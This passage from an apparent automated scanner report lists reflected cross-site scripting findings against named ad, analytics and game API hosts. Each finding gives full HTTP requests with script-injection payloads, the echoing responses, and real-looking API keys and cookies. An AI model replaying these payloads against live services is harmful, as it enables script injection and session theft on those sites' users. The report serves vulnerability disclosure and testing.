<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?Z=1x1&fb233"-alert(1)-"19d71a463a=1&s=2377409&_salt=3393856248";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

2.7. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 595b1"><script>alert(1)</script>d3f03646bfa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=2377409&595b1"><script>alert(1)</script>d3f03646bfa=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:49 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:49:49 GMT
Pragma: no-cache
Content-Length: 4715
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ads.bluelithium.com/imageclick?595b1"><script>alert(1)</script>d3f03646bfa=1&Z=1x1&s=2377409&_salt=4008406020&t=2" target="_parent">
...[SNIP]...

2.8. http://adserving.cpxinteractive.com/st [ad_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b423'-alert(1)-'25f6b002c06 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x05b423'-alert(1)-'25f6b002c06&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:48:56 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:48:56 GMT
Content-Length: 503

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=0x05b423'-alert(1)-'25f6b002c06&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=86400&referrer=http://www.nowpublic.com/&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBU
...[SNIP]...

2.9. http://adserving.cpxinteractive.com/st [pop_frequency parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the pop_frequency request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8de21'-alert(1)-'54cf1ba13ce was submitted in the pop_frequency parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=864008de21'-alert(1)-'54cf1ba13ce HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:49:18 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:49:18 GMT
Content-Length: 494

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=864008de21'-alert(1)-'54cf1ba13ce&referrer=http://www.nowpublic.com/&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1620509%26banned_pop_types%3D2
...[SNIP]...

2.10. http://adserving.cpxinteractive.com/st [pop_times parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the pop_times request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da557'-alert(1)-'2b810b2be8e was submitted in the pop_times parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1da557'-alert(1)-'2b810b2be8e&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:49:14 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:49:14 GMT
Content-Length: 494

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1da557'-alert(1)-'2b810b2be8e&pop_freq_duration=86400&referrer=http://www.nowpublic.com/&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D162050
...[SNIP]...

2.11. http://adserving.cpxinteractive.com/st [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f594'-alert(1)-'282e6498410 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=16205091f594'-alert(1)-'282e6498410&banned_pop_types=29&pop_times=1&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:49:00 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:49:00 GMT
Content-Length: 494

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=16205091f594'-alert(1)-'282e6498410&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=86400&referrer=http://www.nowpublic.com/&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type
...[SNIP]...

2.12. http://api.bizographics.com/v1/profile.redirect [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 93296<script>alert(1)</script>12a9537ccd was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=eff06988d5814684997ff16c58dc2e1c93296<script>alert(1)</script>12a9537ccd&callback_url=http%3A%2F%2Fdts1.raasnet.com%2Fdts%2Fbizo%2Fin HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33; BizoData=ZDDH4OisxVKDXDYTFVciiWVtQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KWxZzbyauJoDaj5XcunNcMDa7Re6IGD4lIvNliiTsQ3d0Ad6xyMUDLG4HisD7PuAiisYPXoxU8ZPy3Exo4N71w46SKb0NrpeKvDEEAHRkUP4DRqbp7KchoR8KSjE5cmLaumWulAJAT7BX2HrsROqwTV75bDCe4W2moTMPW6Nj5X3Td87pcdJDAlOFM4SE3xQyPhdqGoP8BGM4wnZd9rxFhue7CnPt7OKf3925MlVpUzFqnOU3CJ2wtdwM8iiVTP0Et7iiJPsiim5vOPNb1QJipLd4ekU1f7MrQxrTtB1Wxn268X1nipp3OMCDTtSipisN9MTZe7RE8f54Pmyis0b2kXPJlCH2Dc5iivgsHGiiGKQLeexC7h8LZyqRAWM4Y0T5rNbhrhiprNS9j4rsWfOeTjexKjZ6ZI4Zomlgie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 12 Sep 2011 13:06:25 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e339375522360161b3cf7c4fe7e;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 91
Connection: keep-alive

Unknown API key: (eff06988d5814684997ff16c58dc2e1c93296<script>alert(1)</script>12a9537ccd)

2.13. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload a110d<script>alert(1)</script>497df2cabeb was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=eff06988d5814684997ff16c58dc2e1c&callback_url=a110d<script>alert(1)</script>497df2cabeb HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33; BizoData=ZDDH4OisxVKDXDYTFVciiWVtQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KWxZzbyauJoDaj5XcunNcMDa7Re6IGD4lIvNliiTsQ3d0Ad6xyMUDLG4HisD7PuAiisYPXoxU8ZPy3Exo4N71w46SKb0NrpeKvDEEAHRkUP4DRqbp7KchoR8KSjE5cmLaumWulAJAT7BX2HrsROqwTV75bDCe4W2moTMPW6Nj5X3Td87pcdJDAlOFM4SE3xQyPhdqGoP8BGM4wnZd9rxFhue7CnPt7OKf3925MlVpUzFqnOU3CJ2wtdwM8iiVTP0Et7iiJPsiim5vOPNb1QJipLd4ekU1f7MrQxrTtB1Wxn268X1nipp3OMCDTtSipisN9MTZe7RE8f54Pmyis0b2kXPJlCH2Dc5iivgsHGiiGKQLeexC7h8LZyqRAWM4Y0T5rNbhrhiprNS9j4rsWfOeTjexKjZ6ZI4Zomlgie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 12 Sep 2011 13:06:27 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e339375522360161b3cf7c4fe7e;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: a110d<script>alert(1)</script>497df2cabeb

2.14. http://api.chartbeat.com/toppages/ [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.chartbeat.com
Path:   /toppages/

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload be0db<script>alert(1)</script>f34e1e517d7 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toppages/?host=observer.com&jsonp=chartbeat_top_pages.cback2821356be0db<script>alert(1)</script>f34e1e517d7&apikey=e58ef8b1512d5591696ca4b8badf20b9&limit=20 HTTP/1.1
Host: api.chartbeat.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 12 Sep 2011 12:48:15 GMT
Content-Type: text/javascript
Connection: close
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 3926

chartbeat_top_pages.cback2821356be0db<script>alert(1)</script>f34e1e517d7([{"i": "MT: 0", "path": "\/", "visitors": 38}, {"i": "Morning Links: Is Paul Krugman OK? | The New York Observer", "path": "\/2011\/09\/morning-links-is-paul-krugman-ok\/", "visitors": 10}, {"i": "Cre
...[SNIP]...

2.15. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 32eb5<script>alert(1)</script>e1d9a8838e6 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=232eb5<script>alert(1)</script>e1d9a8838e6&c2=6035470&c3=&c4=/&c5=20000&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Mon, 26 Sep 2011 12:50:03 GMT
Date: Mon, 12 Sep 2011 12:50:03 GMT
Content-Length: 1240
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"232eb5<script>alert(1)</script>e1d9a8838e6", c2:"6035470", c3:"", c4:"/", c5:"20000", c6:"", c10:"", c15:"", c16:"", r:""});



2.16. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8de00<script>alert(1)</script>5287633e421 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E?verbosity=9&callback=jQuery16204978716284967959_13158497317468de00<script>alert(1)</script>5287633e421&_=1315849740224 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 12:50:27 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 634
Connection: keep-alive

jQuery16204978716284967959_13158497317468de00<script>alert(1)</script>5287633e421({
"content": "",
"headers": {
"Content-Type": [
"text/html; charset=utf-8"
],
"Vary": [
"Authorization"
],
"Location": [

...[SNIP]...

2.17. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/status [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/status

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 54cb5<script>alert(1)</script>2964cc901df was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/status?verbosity=9&callback=jQuery16204978716284967959_131584973174554cb5<script>alert(1)</script>2964cc901df&_=1315849736810 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 12:50:10 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 435
Connection: keep-alive

jQuery16204978716284967959_131584973174554cb5<script>alert(1)</script>2964cc901df({
"content": "29",
"headers": {
"Content-Type": [
"text/html; charset=utf-8"
],
"Vary": [
"Authorization"
],
"BDM-Reason-Phrase"
...[SNIP]...

2.18. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c26c7<script>alert(1)</script>39da3c5bada was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E?verbosity=9&callback=jQuery162045605130144394934_1315850661325c26c7<script>alert(1)</script>39da3c5bada&_=1315850662055 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 13:04:46 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 6204
Connection: keep-alive

jQuery162045605130144394934_1315850661325c26c7<script>alert(1)</script>39da3c5bada({
"content": [
{
"read_only": 0,
"modified_timestamp": 1315831726,
"resource_name": "end_user",
"award_summaries": [],
"best_gue
...[SNIP]...

2.19. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E/named_level_collection [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E/named_level_collection

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6b724<script>alert(1)</script>5bfe554e92d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E/named_level_collection?attribute_friendly_id=bdm-quest&max_records=15&completion=complete&order_by=-created&verbosity=9&callback=jQuery16204978716284967959_13158497317486b724<script>alert(1)</script>5bfe554e92d&_=1315849741737 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 12:50:42 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 353
Connection: keep-alive

jQuery16204978716284967959_13158497317486b724<script>alert(1)</script>5bfe554e92d({
"content": [
[],
{}
],
"headers": {
"Content-Type": [
"application/json; charset=utf-8"
],
"Vary": [
"Authorization"

...[SNIP]...

2.20. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_level_collection [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_level_collection

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c780e<script>alert(1)</script>f8f059caaeb was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_level_collection?attribute_friendly_id=bdm-quest-active&max_records=1&order_by=-relative_weight&verbosity=9&callback=jQuery16204978716284967959_1315849731747c780e<script>alert(1)</script>f8f059caaeb&_=1315849741736 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
